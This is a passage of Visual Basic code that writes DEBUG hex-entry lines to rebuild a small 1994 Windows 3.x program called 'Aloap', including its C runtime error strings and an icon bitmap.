Print #hFile, "E 0370 14 00 FF 36 12 00 FF 36 18 00 FF 36 16 00 FF 36"
Print #hFile, "E 0380 1A 00 9A F0 08 BB 00 83 ED 02 8B E5 1F 5D 4D CB"
Print #hFile, "E 0390 8C D8 90 45 55 8B EC 1E 8E D8 B8 00 35 2E F7 06"
Print #hFile, "E 03A0 10 00 01 00 74 07 9A 5E 00 00 00 EB 02 CD 21 89"
Print #hFile, "E 03B0 1E 32 00 8C 06 34 00 0E 1F B8 00 25 BA E6 04 2E"
Print #hFile, "E 03C0 F7 06 10 00 01 00 74 07 9A 07 01 00 00 EB 02 CD"
Print #hFile, "E 03D0 21 16 1F 8B 0E 1E 01 E3 29 8E 06 46 00 26 8B 36"
Print #hFile, "E 03E0 2C 00 A1 20 01 8B 16 22 01 33 DB FF 1E 1C 01 73"
Print #hFile, "E 03F0 03 E9 7A 01 A1 24 01 8B 16 26 01 BB 03 00 FF 1E"
Print #hFile, "E 0400 1C 01 8E 06 46 00 26 8B 0E 2C 00 E3 3E 8E C1 33"
Print #hFile, "E 0410 FF 26 80 3D 00 74 34 B9 0D 00 BE 24 00 F3 A6 74"
Print #hFile, "E 0420 0B B9 FF 7F 33 C0 F2 AE 75 21 EB E5 06 1E 07 1F"
Print #hFile, "E 0430 8B F7 BF 58 00 B1 04 AC 2C 41 72 0D D2 E0 92 AC"
Print #hFile, "E 0440 2C 41 72 05 0A C2 AA EB EE 16 1F BE 28 01 BF 28"
Print #hFile, "E 0450 01 E8 E2 00 BE 28 01 BF 28 01 E8 D9 00 BE 28 01"
Print #hFile, "E 0460 BF 28 01 E8 D0 00 83 ED 02 8B E5 1F 5D 4D CB 8C"
Print #hFile, "E 0470 D8 90 45 55 8B EC 1E 8E D8 33 C9 EB 2F 8C D8 90"
Print #hFile, "E 0480 45 55 8B EC 1E 8E D8 B9 01 00 EB 20 8C D8 90 45"
Print #hFile, "E 0490 55 8B EC 1E 8E D8 56 57 B9 00 01 EB 0F 8C D8 90"
Print #hFile, "E 04A0 45 55 8B EC 1E 8E D8 56 57 B9 01 01 88 2E 8D 00"
Print #hFile, "E 04B0 51 0A C9 75 1C BE 8A 02 BF 8A 02 E8 78 00 BE 28"
Print #hFile, "E 04C0 01 BF 28 01 E8 6F 00 8B 76 06 56 E8 B8 05 83 C4"
Print #hFile, "E 04D0 02 BE 28 01 BF 28 01 E8 5C 00 BE 28 01 BF 28 01"
Print #hFile, "E 04E0 E8 53 00 E8 27 00 58 0A E4 75 17 8B 46 06 B4 4C"
Print #hFile, "E 04F0 2E F7 06 10 00 01 00 74 07 9A 29 01 00 00 EB 02"
Print #hFile, "E 0500 CD 21 5F 5E 83 ED 02 8B E5 1F 5D 4D CB 8B 0E 1E"
Print #hFile, "E 0510 01 E3 07 BB 02 00 FF 1E 1C 01 1E C5 16 32 00 B8"
Print #hFile, "E 0520 00 25 2E F7 06 10 00 01 00 74 07 9A 5A 02 00 00"
Print #hFile, "E 0530 EB 02 CD 21 1F C3 3B F7 73 0E 83 EF 04 8B 05 0B"
Print #hFile, "E 0540 45 02 74 F2 FF 1D EB EE C3 00 8C D8 90 45 55 8B"
Print #hFile, "E 0550 EC 1E 8E D8 B8 FC 00 50 0E E8 A9 02 B8 FF 00 50"
Print #hFile, "E 0560 0E E8 A1 02 83 ED 02 8B E5 1F 5D 4D CB 00 B8 02"
Print #hFile, "E 0570 00 E9 17 02 8F 06 92 00 8F 06 94 00 B8 04 01 B9"
Print #hFile, "E 0580 08 00 E8 BD 02 89 16 88 00 A3 86 00 52 50 FF 36"
Print #hFile, "E 0590 14 00 52 50 B8 04 01 50 9A FF FF 00 00 5B 07 03"
Print #hFile, "E 05A0 D8 26 C6 07 00 BA 01 00 BF 01 00 BE 81 00 8E 1E"
Print #hFile, "E 05B0 46 00 AC 3C 20 74 FB 3C 09 74 F7 3C 0D 74 6F 0A"
Print #hFile, "E 05C0 C0 74 6B 47 4E AC 3C 20 74 E8 3C 09 74 E4 3C 0D"
Print #hFile, "E 05D0 74 5C 0A C0 74 58 3C 22 74 24 3C 5C 74 03 42 EB"
Print #hFile, "E 05E0 E4 33 C9 41 AC 3C 5C 74 FA 3C 22 74 04 03 D1 EB"
Print #hFile, "E 05F0 D3 8B C1 D1 E9 13 D1 A8 01 75 CA EB 01 4E AC 3C"
Print #hFile, "E 0600 0D 74 2B 0A C0 74 27 3C 22 74 BA 3C 5C 74 03 42"
Print #hFile, "E 0610 EB EC 33 C9 41 AC 3C 5C 74 FA 3C 22 74 04 03 D1"
Print #hFile, "E 0620 EB DB 8B C1 D1 E9 13 D1 A8 01 75 D2 EB 97 16 1F"
Print #hFile, "E 0630 89 3E 80 00 03 D7 47 D1 E7 03 D7 42 80 E2 FE 2B"
Print #hFile, "E 0640 E2 8B C4 A3 82 00 8B D8 03 FB 16 07 C5 36 86 00"
Print #hFile, "E 0650 36 89 37 43 43 36 8E 1E 46 00 BE 81 00 EB 03 33"
Print #hFile, "E 0660 C0 AA AC 3C 20 74 FB 3C 09 74 F7 3C 0D 74 7C 0A"
Print #hFile, "E 0670 C0 74 78 36 89 3F 43 43 4E AC 3C 20 74 E1 3C 09"
Print #hFile, "E 0680 74 DD 3C 0D 74 62 0A C0 74 5E 3C 22 74 27 3C 5C"
Print #hFile, "E 0690 74 03 AA EB E4 33 C9 41 AC 3C 5C 74 FA 3C 22 74"
Print #hFile, "E 06A0 06 B0 5C F3 AA EB D1 B0 5C D1 E9 F3 AA 73 06 B0"
Print #hFile, "E 06B0 22 AA EB C5 4E AC 3C 0D 74 2E 0A C0 74 2A 3C 22"
Print #hFile, "E 06C0 74 B7 3C 5C 74 03 AA EB EC 33 C9 41 AC 3C 5C 74"
Print #hFile, "E 06D0 FA 3C 22 74 06 B0 5C F3 AA EB D9 B0 5C D1 E9 F3"
Print #hFile, "E 06E0 AA 73 96 B0 22 AA EB CD 33 C0 AA 16 1F C7 07 00"
Print #hFile, "E 06F0 00 FF 2E 92 00 00 8C D8 90 45 55 8B EC 1E 8E D8"
Print #hFile, "E 0700 1E 9A FF FF 00 00 0B C0 74 03 BA 00 00 8B DA 8E"
Print #hFile, "E 0710 C2 33 C0 33 F6 33 FF B9 FF FF 0B DB 74 0E 26 80"
Print #hFile, "E 0720 3E 00 00 00 74 06 F2 AE 46 AE 75 FA 8B C7 40 24"
Print #hFile, "E 0730 FE 46 8B FE D1 E6 B9 09 00 E8 06 01 50 8B C6 E8"
Print #hFile, "E 0740 00 01 A3 84 00 06 1E 07 1F 8B CF 8B D8 33 F6 5F"
Print #hFile, "E 0750 49 E3 26 8B 04 36 3B 06 24 00 75 10 51 56 57 BF"
Print #hFile, "E 0760 24 00 B9 06 00 F3 A7 5F 5E 59 74 05 26 89 3F 43"
Print #hFile, "E 0770 43 AC AA 0A C0 75 FA E2 DA 26 89 0F 1F 83 ED 02"
Print #hFile, "E 0780 8B E5 1F 5D 4D CB 16 1F B8 03 00 50 50 0E E8 B9"
Print #hFile, "E 0790 FD 0E E8 70 00 0E E8 35 00 33 DB 0B C0 74 1D 8B"
Print #hFile, "E 07A0 F8 B8 09 00 80 3D 4D 75 03 B8 0F 00 03 F8 57 1E"
Print #hFile, "E 07B0 07 B0 0D B9 22 00 F2 AE 88 5D FF 58 53 1E 50 9A"
Print #hFile, "E 07C0 FF FF 00 00 B8 FF 00 50 9A FF FF 00 00 00 8C D8"
Print #hFile, "E 07D0 90 45 55 8B EC 1E 8E D8 56 57 1E 07 8B 56 06 BE"
Print #hFile, "E 07E0 30 01 AD 3B C2 74 10 40 96 74 0C 97 33 C0 B9 FF"
Print #hFile, "E 07F0 FF F2 AE 8B F7 EB EB 96 5F 5E 83 ED 02 8B E5 1F"
Print #hFile, "E 0800 5D 4D CA 02 00 8C D8 90 45 55 8B EC 1E 8E D8 57"
Print #hFile, "E 0810 83 3E 9C 00 00 74 1F FF 76 06 0E E8 B0 FF 0B C0"
Print #hFile, "E 0820 74 14 92 8B FA 33 C0 B9 FF FF F2 AE F7 D1 49 8B"
Print #hFile, "E 0830 1E 52 00 E8 55 02 5F 83 ED 02 8B E5 1F 5D 4D CA"
Print #hFile, "E 0840 02 00 55 8B EC 53 06 51 B9 00 10 87 0E 96 00 51"
Print #hFile, "E 0850 50 9A F2 07 E5 00 5B 8F 06 96 00 59 8C DA 0B C0"
Print #hFile, "E 0860 74 04 07 5B EB 05 8B C1 E9 20 FF 8B E5 5D C3 00"
Print #hFile, "E 0870 51 57 F6 47 02 01 74 63 E8 E7 00 8B FE 8B 04 A8"
Print #hFile, "E 0880 01 74 03 2B C8 49 41 41 8B 77 04 0B F6 74 4C 03"
Print #hFile, "E 0890 CE 73 09 33 C0 BA F0 FF E3 30 EB 3F 16 07 26 A1"
Print #hFile, "E 08A0 96 00 3D 00 10 74 16 BA 00 80 3B D0 72 06 D1 EA"
Print #hFile, "E 08B0 75 F8 EB 22 83 FA 08 72 1D D1 E2 8B C2 48 8B D0"
Print #hFile, "E 08C0 03 C1 73 02 33 C0 F7 D2 23 C2 52 E8 2E 00 5A 73"
Print #hFile, "E 08D0 0D 83 FA F0 74 05 B8 10 00 EB E2 F9 EB 1B 8B D0"
Print #hFile, "E 08E0 2B 57 04 89 47 04 89 7F 0A 8B 77 0C 4A 89 14 42"
Print #hFile, "E 08F0 03 F2 C7 04 FE FF 89 77 0C 5F 59 C3 8B D0 F6 47"
Print #hFile, "E 0900 02 04 74 02 EB 51 52 51 53 8B 77 06 2E 8B 1E 10"
Print #hFile, "E 0910 00 33 C9 0B D2 75 07 F7 C3 10 00 75 40 41 B8 02"
Print #hFile, "E 0920 00 F7 C3 01 00 75 03 B8 20 00 56 51 52 50 9A FF"
Print #hFile, "E 0930 FF 00 00 0B C0 74 26 3B C6 75 1C 56 9A FF FF 00"
Print #hFile, "E 0940 00 0B D0 74 12 5B 59 5A 8B C2 F6 47 02 04 74 04"
Print #hFile, "E 0950 4A 89 57 FE F8 EB 0A B8 12 00 E9 2E FE 5B 59 5A"
Print #hFile, "E 0960 F9 C3 57 8B 77 0A 3B 77 0C 75 03 8B 77 08 AD 83"
Print #hFile, "E 0970 F8 FE 74 08 8B FE 24 FE 03 F0 EB F2 4F 4F 8B F7"
Print #hFile, "E 0980 5F C3 45 55 8B EC 1E 8B 46 06 A3 98 00 C7 06 9A"
Print #hFile, "E 0990 00 00 00 8D 66 FE 1F 5D 4D CB 45 55 8B EC 1E B8"
Print #hFile, "E 09A0 FD 43 BA 03 00 52 50 FF 36 9A 00 FF 36 98 00 9A"
Print #hFile, "E 09B0 2E 07 B4 05 05 C3 9E 83 D2 26 A3 98 00 89 16 9A"
Print #hFile, "E 09C0 00 8B C2 80 E4 7F 8D 66 FE 1F 5D 4D CB 90 55 8B"
Print #hFile, "E 09D0 EC 8B 46 08 8B 4E 0C 0B C8 8B 4E 0A 75 09 8B 46"
Print #hFile, "E 09E0 06 F7 E1 5D CA 08 00 53 F7 E1 8B D8 8B 46 06 F7"
Print #hFile, "E 09F0 66 0C 03 D8 8B 46 06 F7 E1 03 D3 5B 5D CA 08 00"
Print #hFile, "E 0A00 55 8B EC 33 C0 8B 4E 0E E3 79 1E 57 56 C5 76 06"
Print #hFile, "E 0A10 C4 7E 0A 8B C1 48 8B D7 F7 D2 2B C2 1B DB 23 C3"
Print #hFile, "E 0A20 03 C2 8B D6 F7 D2 2B C2 1B DB 23 C3 03 C2 40 91"
Print #hFile, "E 0A30 2B C1 92 AC 26 8A 25 3A E0 75 1F 47 E2 F5 92 91"
Print #hFile, "E 0A40 E3 3E 0B F6 75 07 8C D8 05 FF FF 8E D8 0B FF 75"
Print #hFile, "E 0A50 C2 8C C0 05 A9 07 8E C0 EB B9 2C 41 3C 1A 1A DB"
Print #hFile, "E 0A60 80 E3 20 02 C3 04 41 80 EC 41 80 FC 1A 1A DB 80"
Print #hFile, "E 0A70 E3 20 02 E3 80 C4 41 3A C4 74 C0 1B C0 83 D8 FF"
Print #hFile, "E 0A80 5E 5F 1F 5D CB 00 55 8B EC 5D C3 B8 14 00 E9 FA"
Print #hFile, "E 0A90 FC 00 45 55 8B EC 1E 83 EC 02 83 7E 06 00 75 05"
Print #hFile, "E 0AA0 C7 46 06 01 00 B8 FF FF 50 9A 9F 08 00 00 B8 20"
Print #hFile, "E 0AB0 00 50 FF 76 06 9A FF FF 00 00 89 46 FC B8 FF FF"
Print #hFile, "E 0AC0 50 9A C7 08 00 00 83 7E FC 00 75 17 A1 A0 00 0B"
Print #hFile, "E 0AD0 06 9E 00 74 0E FF 76 06 FF 1E 9E 00 83 C4 02 0B"
Print #hFile, "E 0AE0 C0 75 C2 8B 46 FC 8D 66 FE 1F 5D 4D CB 90 45 55"
Print #hFile, "E 0AF0 8B EC 1E 83 7E 06 00 74 08 FF 76 06 9A FF FF 00"
Print #hFile, "E 0B00 00 8D 66 FE 1F 5D 4D CB 45 55 8B EC 1E 83 EC 04"
Print #hFile, "E 0B10 83 7E 06 00 75 0E FF 76 08 9A F2 07 90 08 83 C4"
Print #hFile, "E 0B20 02 EB 4B 90 83 7E 08 00 75 10 FF 76 06 9A 4E 08"
Print #hFile, "E 0B30 12 07 83 C4 02 33 C0 EB 35 90 B8 FF FF 50 9A FF"
Print #hFile, "E 0B40 FF 00 00 FF 76 06 83 7E 08 00 74 06 8B 46 08 EB"
Print #hFile, "E 0B50 04 90 B8 01 00 50 B8 62 00 50 9A FF FF 00 00 89"
Print #hFile, "E 0B60 46 FC B8 FF FF 50 9A FF FF 00 00 8B 46 FC 8D 66"
Print #hFile, "E 0B70 FE 1F 5D 4D CB 90 45 55 8B EC 1E FF 76 06 9A FF"
Print #hFile, "E 0B80 FF 00 00 8D 66 FE 1F 5D 4D CB 00 00 00 00 00 00"
Print #hFile, "E 0B90 C8 02 00 00 56 83 7E 0C 00 74 19 9A FF FF 00 00"
Print #hFile, "E 0BA0 50 1E 68 A8 00 1E 68 A2 00 6A 10 9A FF FF 00 00"
Print #hFile, "E 0BB0 33 C0 EB 30 8B 76 FE FF 76 06 FF 76 0A FF 76 08"
Print #hFile, "E 0BC0 FF 76 0C FF 76 0E 9A 4A 09 38 09 83 C4 0A 0B C0"
Print #hFile, "E 0BD0 74 10 FF 76 0E 9A E4 09 40 09 5B 8B F0 9A 14 0A"
Print #hFile, "E 0BE0 FF FF 8B C6 5E C9 CA 0A 00 00 C8 1A 00 00 56 8B"
Print #hFile, "E 0BF0 76 06 83 7E 08 00 75 4F C7 46 E6 00 00 C7 46 E8"
Print #hFile, "E 0C00 16 0A C7 46 EA 29 09 33 C0 89 46 EC 89 46 EE 89"
Print #hFile, "E 0C10 76 F0 56 1E 68 C2 00 9A FF FF 00 00 89 46 F2 C7"
Print #hFile, "E 0C20 46 F4 00 00 C7 46 F6 02 00 2B C0 89 46 FA 89 46"
Print #hFile, "E 0C30 F8 C7 46 FC CC 00 8C 5E FE 8D 46 E6 16 50 9A FF"
Print #hFile, "E 0C40 FF 00 00 0B C0 74 39 1E 68 CC 00 1E 68 DA 00 68"
Print #hFile, "E 0C50 08 20 6A 00 68 00 80 68 00 80 68 00 80 68 00 80"
Print #hFile, "E 0C60 6A 00 6A 00 56 6A 00 6A 00 9A FF FF 00 00 A3 92"
Print #hFile, "E 0C70 02 89 36 90 02 50 6A 07 9A FF FF 00 00 A1 92 02"
Print #hFile, "E 0C80 5E C9 CB 00 C8 12 00 00 EB 14 8D 46 EE 16 50 9A"
Print #hFile, "E 0C90 FF FF 00 00 8D 46 EE 16 50 9A FF FF 00 00 8D 46"
Print #hFile, "E 0CA0 EE 16 50 6A 00 6A 00 6A 00 9A FF FF 00 00 0B C0"
Print #hFile, "E 0CB0 75 D8 C9 CB CB 00 C8 14 00 00 57 56 8B 46 0C 48"
Print #hFile, "E 0CC0 74 2D 48 75 03 E9 AC 00 2D 11 00 75 03 E9 DE 00"
Print #hFile, "E 0CD0 2D 00 01 75 03 E9 BD 00 FF 76 0E FF 76 0C FF 76"
Print #hFile, "E 0CE0 0A FF 76 08 FF 76 06 9A FF FF 00 00 E9 C2 00 8B"
Print #hFile, "E 0CF0 76 0E 6A 00 9A 5F 0A 00 00 A3 7A 02 6A 01 9A FF"
Print #hFile, "E 0D00 FF 00 00 A3 7C 02 56 68 4C 04 1E 68 A2 00 1E 68"
Print #hFile, "E 0D10 E8 00 6A 1E 9A FF FF 00 00 8B F8 50 6A 00 6A 00"
Print #hFile, "E 0D20 9A FF FF 00 00 57 1E 68 EE 00 8D 46 EC 16 50 9A"
Print #hFile, "E 0D30 FF FF 00 00 83 C4 0A 1E 68 A2 00 1E 68 E8 00 8D"
Print #hFile, "E 0D40 46 EC 16 50 9A B6 0A 00 00 1E 68 A2 00 1E 68 0A"
Print #hFile, "E 0D50 01 1E 68 F2 00 9A FF FF 00 00 68 65 09 68 18 0B"
Print #hFile, "E 0D60 FF 36 90 02 9A FF FF 00 00 A3 7E 02 89 16 80 02"
Print #hFile, "E 0D70 56 E9 67 FF FF 36 80 02 FF 36 7E 02 9A FF FF 00"
Print #hFile, "E 0D80 00 FF 76 0E 68 4C 04 9A FF FF 00 00 6A 00 9A FF"
Print #hFile, "E 0D90 FF 00 00 EB 19 8B 46 0A 2D 4C 04 75 11 FF 36 80"
Print #hFile, "E 0DA0 02 FF 36 7E 02 6A 00 6A 00 9A FF FF 00 00 33 C0"
Print #hFile, "E 0DB0 99 5E 5F C9 CA 0A 00 00 C8 26 00 00 57 56 8B 76"
Print #hFile, "E 0DC0 0A 56 8D 46 DA 16 50 6A 13 9A FF FF 00 00 6A 06"
Print #hFile, "E 0DD0 1E 68 12 01 8D 46 DA 16 50 9A 60 07 A8 0B 83 C4"
Print #hFile, "E 0DE0 0A 0B C0 74 1E 56 9A FF FF 00 00 0B C0 75 14 56"
Print #hFile, "E 0DF0 9A FF FF 00 00 0B C0 74 0A 56 9A FF FF 00 00 0B"
Print #hFile, "E 0E00 C0 75 03 E9 CA 00 56 8D 46 EE 16 50 9A FF FF 00"
Print #hFile, "E 0E10 00 8B 46 F2 8B 7E EE 2B C7 89 46 FC 8B 46 F0 89"
Print #hFile, "E 0E20 46 FE 2B 46 F4 F7 D8 89 46 FA 0B FF 7F 07 C7 46"
Print #hFile, "E 0E30 F6 01 00 EB 29 8B 46 FC 03 C7 3B 06 7A 02 7C 05"
Print #hFile, "E 0E40 B8 FF FF EB 16 9A FA 06 DF 0B 2D FF 3F 0B C0 7E"
Print #hFile, "E 0E50 05 B8 01 00 EB 02 33 C0 03 C0 48 89 46 F6 83 7E"
Print #hFile, "E 0E60 FE 00 7F 07 C7 46 F8 01 00 EB 2A 8B 46 FA 03 46"
Print #hFile, "E 0E70 FE 3B 06 7C 02 7C 05 B8 FF FF EB 16 9A FA 06 F8"
Print #hFile, "E 0E80 0B 2D FF 3F 0B C0 7E 05 B8 01 00 EB 02 33 C0 03"
Print #hFile, "E 0E90 C0 48 89 46 F8 9A FA 06 0F 0C 8B C8 81 C1 E8 03"
Print #hFile, "E 0EA0 69 46 F6 30 75 99 F7 F9 03 F8 56 57 9A FA 06 BB"
Print #hFile, "E 0EB0 0A 8B C8 81 C1 E8 03 69 46 F8 30 75 99 F7 F9 03"
Print #hFile, "E 0EC0 46 FE 50 FF 76 FC FF 76 FA 6A 01 9A FF FF 00 00"
Print #hFile, "E 0ED0 B8 FF FF 5E 5F C9 CA 06 00 2E 00 03 01 F0 09 02"
Print #hFile, "E 0EE0 00 71 00 03 01 FA 09 02 00 72 00 02 00 7C 08 01"
Print #hFile, "E 0EF0 00 00 00 03 01 29 05 01 00 01 00 03 01 49 00 01"
Print #hFile, "E 0F00 00 03 00 03 01 62 04 01 00 83 00 03 01 16 08 01"
Print #hFile, "E 0F10 00 05 00 03 01 BB 08 01 00 06 00 03 01 5D 08 01"
Print #hFile, "E 0F20 00 07 00 03 01 0C 09 02 00 01 00 03 01 20 05 01"
Print #hFile, "E 0F30 00 89 00 05 01 B4 07 01 00 72 00 03 01 DF 08 01"
Print #hFile, "E 0F40 00 0A 00 03 01 89 00 02 00 05 00 03 01 EF 0A 02"
Print #hFile, "E 0F50 00 06 00 03 01 8F 06 01 00 10 00 03 01 81 0A 02"
Print #hFile, "E 0F60 00 0A 00 03 01 E8 0A 02 00 0C 00 03 01 9D 06 01"
Print #hFile, "E 0F70 00 14 00 03 01 0A 08 01 00 17 00 03 01 22 08 01"
Print #hFile, "E 0F80 00 18 00 03 01 80 00 01 00 1E 00 03 01 FC 08 02"
Print #hFile, "E 0F90 00 17 00 03 01 47 0B 02 00 1F 00 03 01 6D 0B 02"
Print #hFile, "E 0FA0 00 20 00 03 01 5B 0B 02 00 23 00 03 01 90 0A 02"
Print #hFile, "E 0FB0 00 A4 01 03 01 CA 09 02 00 29 00 03 01 F9 02 01"
Print #hFile, "E 0FC0 00 31 00 03 01 D9 09 02 00 2A 00 03 01 C5 0A 01"
Print #hFile, "E 0FD0 00 33 00 03 01 DD 0A 01 00 34 00 03 01 78 09 02"
Print #hFile, "E 0FE0 00 AE 00 03 01 75 0A 01 00 39 00 03 01 51 0B 02"
Print #hFile, "E 0FF0 00 31 00 03 01 A5 0A 01 00 3B 00 03 01 55 0A 02"
Print #hFile, "E 1000 00 B3 00 03 01 0A 0B 02 00 36 00 03 01 2C 0C 02"
Print #hFile, "E 1010 00 38 00 03 01 9F 09 02 00 39 00 03 01 2A 0B 02"
Print #hFile, "E 1020 00 3A 00 05 01 10 00 01 00 B2 00 03 01 1E 00 01"
Print #hFile, "E 1030 00 5B 00 03 01 8C 02 01 00 66 00 03 01 48 0A 02"
Print #hFile, "E 1040 00 6B 00 03 01 0A 0A 02 00 6C 00 00 00 00 00 00"
Print #hFile, "E 1050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1060 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1070 00 00 00 00 00 00 00 00 00 00 00 00 01 00 FF FF"
Print #hFile, "E 1080 00 00 00 00 5F 43 5F 46 49 4C 45 5F 49 4E 46 4F"
Print #hFile, "E 1090 3D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 10A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01"
Print #hFile, "E 10B0 00 00 14 00 14 00 28 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 10C0 00 00 00 00 00 00 00 00 00 00 00 00 C1 00 00 00"
Print #hFile, "E 10D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 10E0 00 00 00 00 00 00 8A 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 10F0 00 00 00 00 00 00 00 10 01 00 00 00 00 00 00 00"
Print #hFile, "E 1100 00 00 41 6C 6F 61 70 00 41 6C 6F 61 70 20 41 70"
Print #hFile, "E 1110 70 20 41 6C 72 65 61 64 79 20 52 75 6E 6E 69 6E"
Print #hFile, "E 1120 67 00 61 6C 6F 61 70 69 63 6F 00 00 41 4C 4F 41"
Print #hFile, "E 1130 50 57 6E 64 43 6C 61 73 73 00 41 6C 6F 61 70 20"
Print #hFile, "E 1140 57 69 6E 64 6F 77 00 00 54 69 6D 65 72 00 25 64"
Print #hFile, "E 1150 00 00 20 53 74 65 66 61 6E 6F 20 50 65 72 6F 74"
Print #hFile, "E 1160 74 6F 20 2D 20 31 39 39 34 00 50 72 6F 6A 65 63"
Print #hFile, "E 1170 74 00 23 33 32 37 37 32 00 00 00 00 00 00 00 00"
Print #hFile, "E 1180 00 00 00 00 00 00 00 00 3C 3C 4E 4D 53 47 3E 3E"
Print #hFile, "E 1190 00 00 52 36 30 30 30 0D 0A 2D 20 73 74 61 63 6B"
Print #hFile, "E 11A0 20 6F 76 65 72 66 6C 6F 77 0D 0A 00 03 00 52 36"
Print #hFile, "E 11B0 30 30 33 0D 0A 2D 20 69 6E 74 65 67 65 72 20 64"
Print #hFile, "E 11C0 69 76 69 64 65 20 62 79 20 30 0D 0A 00 09 00 52"
Print #hFile, "E 11D0 36 30 30 39 0D 0A 2D 20 6E 6F 74 20 65 6E 6F 75"
Print #hFile, "E 11E0 67 68 20 73 70 61 63 65 20 66 6F 72 20 65 6E 76"
Print #hFile, "E 11F0 69 72 6F 6E 6D 65 6E 74 0D 0A 00 12 00 52 36 30"
Print #hFile, "E 1200 31 38 0D 0A 2D 20 75 6E 65 78 70 65 63 74 65 64"
Print #hFile, "E 1210 20 68 65 61 70 20 65 72 72 6F 72 0D 0A 00 14 00"
Print #hFile, "E 1220 52 36 30 32 30 0D 0A 2D 20 75 6E 65 78 70 65 63"
Print #hFile, "E 1230 74 65 64 20 51 75 69 63 6B 57 69 6E 20 65 72 72"
Print #hFile, "E 1240 6F 72 0D 0A 00 08 00 52 36 30 30 38 0D 0A 2D 20"
Print #hFile, "E 1250 6E 6F 74 20 65 6E 6F 75 67 68 20 73 70 61 63 65"
Print #hFile, "E 1260 20 66 6F 72 20 61 72 67 75 6D 65 6E 74 73 0D 0A"
Print #hFile, "E 1270 00 15 00 52 36 30 32 31 0D 0A 2D 20 6E 6F 20 6D"
Print #hFile, "E 1280 61 69 6E 20 70 72 6F 63 65 64 75 72 65 0D 0A 00"
Print #hFile, "E 1290 FC 00 0D 0A 00 FF 00 72 75 6E 2D 74 69 6D 65 20"
Print #hFile, "E 12A0 65 72 72 6F 72 20 00 02 00 52 36 30 30 32 0D 0A"
Print #hFile, "E 12B0 2D 20 66 6C 6F 61 74 69 6E 67 2D 70 6F 69 6E 74"
Print #hFile, "E 12C0 20 73 75 70 70 6F 72 74 20 6E 6F 74 20 6C 6F 61"
Print #hFile, "E 12D0 64 65 64 0D 0A 00 FF FF FF 00 00 00 00 00 00 00"
Print #hFile, "E 12E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 12F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1340 00 00 01 00 01 00 20 20 10 00 01 00 04 00 E8 02"
Print #hFile, "E 1350 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1360 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00"
Print #hFile, "E 1370 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00"
Print #hFile, "E 1390 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00"
Print #hFile, "E 13A0 80 80 00 00 80 80 80 00 C0 C0 C0 00 00 00 FF 00"
Print #hFile, "E 13B0 00 FF 00 00 00 FF FF 00 FF 00 00 00 FF 00 FF 00"
Print #hFile, "E 13C0 FF FF 00 00 FF FF FF 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 13D0 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 13E0 FF FF FF FF FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 13F0 FF FF FF FF FF FF FF 00 FF 9F FF FF FF FF FF FF"
Print #hFile, "E 1400 FF FF FF FF FF FF FF 00 FF 9F FF FF FF FF FF FF"
Print #hFile, "E 1410 FF FF FF FF FF FF FF 00 FF 9F FF FF FF FF FF FF"
Print #hFile, "E 1420 FF FF FF FF F9 FF FF 00 FF F9 99 9F FF FF FF FF"
Print #hFile, "E 1430 FF FF FF FF 9F 9F FF 00 FF FF FF F9 99 9F FF FF"
Print #hFile, "E 1440 FF FF FF F9 FF F9 FF 00 FF FF FF FF FF 9F FF FF"
Print #hFile, "E 1450 FF FF FF 9F FF FF FF 00 FF FF FF FF FF F9 FF FF"
Print #hFile, "E 1460 FF FF F9 FF FF FF FF 00 FF FF FF FF FF F9 9F FF"
Print #hFile, "E 1470 FF FF F9 FF FF FF FF 00 FF FF FF FF FF FF 9F FF"
Print #hFile, "E 1480 FF FF 99 FF FF FF FF 00 FF FF FF FF FF FF 99 99"
Print #hFile, "E 1490 99 99 9F FF FF FF FF 00 FF FF FF FF FF FF F9 99"
Print #hFile, "E 14A0 FF FF FF FF FF FF FF 00 FF FF FF FF FF FF F9 99"
Print #hFile, "E 14B0 FF FF FF FF FF FF FF 00 FF FF FF 9F FF FF FF 99"
Print #hFile, "E 14C0 9F FF FF F9 FF FF FF 00 FF FF FF F9 FF FF FF F9"
Print #hFile, "E 14D0 9F FF FF 9F 9F FF FF 00 FF FF FF FF 9F FF FF FF"
Print #hFile, "E 14E0 99 FF 99 FF F9 FF FF 00 FF FF FF FF F9 FF FF FF"
Print #hFile, "E 14F0 99 F9 FF FF FF 9F FF 00 FF FF FF FF FF 9F FF FF"
Print #hFile, "E 1500 99 9F FF FF FF FF FF 00 FF FF FF FF FF F9 99 99"
Print #hFile, "E 1510 99 9F FF FF FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1520 FF 9F FF FF FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1530 FF 99 99 FF FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1540 FF F9 99 9F FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1550 FF F9 99 99 FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1560 FF FF 99 99 FF FF FF 00 FF FF FF FF FF FF FF FF"
